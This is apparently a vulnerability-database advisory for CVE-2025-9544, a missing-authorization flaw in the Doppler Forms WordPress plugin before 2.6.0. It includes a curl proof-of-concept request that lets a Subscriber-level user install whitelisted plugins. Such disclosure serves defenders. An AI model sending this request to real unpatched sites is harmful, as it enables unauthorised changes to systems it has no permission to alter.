Doppler Forms < 2.6.0 – Subscriber+ Limited Plugin Installation | CVE 2025-9544 | Plugin Vulnerabilities

Description

The plugin registers an AJAX action install_extension without verifying user capabilities or using a nonce. As a result, any authenticated user — including those with the Subscriber role — can install and activate additional plugins (limited to those whitelisted by the main plugin).

Proof of Concept

curl -i -X POST "https://example.com/wp-admin/admin-ajax.php" \
  -H "Cookie: wordpress_logged_in=insert_subscriber_user_cookie_here" \
  -d "action=install_extension" \
  -d "extensionName=doppler-for-woocommerce"

Note:
The extensionName value can be replaced with any other supported plugin slug defined inside the plugin’s $this->extensions array, such as doppler-for-learnpress.

Affects Plugins

Fixed in 2.6.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/nxploited

Verified

Yes

WPVDB ID

06312fba-dfc5-47af-afe3-b01d8941acbf

Timeline

Publicly Published

2025-10-08 (about 2 months ago)

Added

2025-10-01 (about 2 months ago)

Last Updated

2025-10-13 (about 2 months ago)

Other

Published

Title

Published

2023-10-25

Title

Ni WooCommerce Sales Report < 3.7.4 - Subscriber+ Sale & Order Reports Access

Published

2025-12-03

Title

Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App < 3.6.2 - Missing Authorization to Authenticated (Subscriber+) OAuth Token Update

Published

2023-12-21

Title

Uncode Core < 2.8.9 - Privilege Escalation

Published

2025-01-03

Title

Allada T-shirt Designer for Woocommerce <= 1.1 - Missing Authorization

Published

2025-04-04

Title

Revive.so – Bulk Rewrite and Republish Blog Posts < 2.0.4 - Missing Authorization